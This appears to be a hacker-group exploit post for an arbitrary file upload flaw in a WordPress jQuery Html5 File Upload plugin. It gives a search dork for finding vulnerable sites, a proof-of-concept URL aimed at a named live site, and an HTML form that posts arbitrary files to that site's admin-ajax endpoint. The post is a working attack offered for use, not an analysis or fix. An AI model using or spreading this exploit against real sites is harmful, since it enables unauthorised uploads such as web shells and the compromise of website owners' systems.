=================================================================================
Wordpress Plugins Jquery Html5 File Upload Vulerability Arbitrary File Upload by Me
Author : AnoaGhost #Intelsect
Dork : inurl:/wp-content/plugins/jquery-html5-file-upload/
=================================================================================
Poc:
http://students4students.us/wp-admin/admin-ajax.php…
Exploit
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By Mr.DreamX196</font><br>
<form method="POST" action="http://students4students.us/wp-admin/admin-ajax.php…"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
You can See Your File in There
smile emotikon
smile emotikon
Look My File
http://students4students.us/…/…//files//guest//dream.png
Greet'Z : My Country Indonesian & My Friends
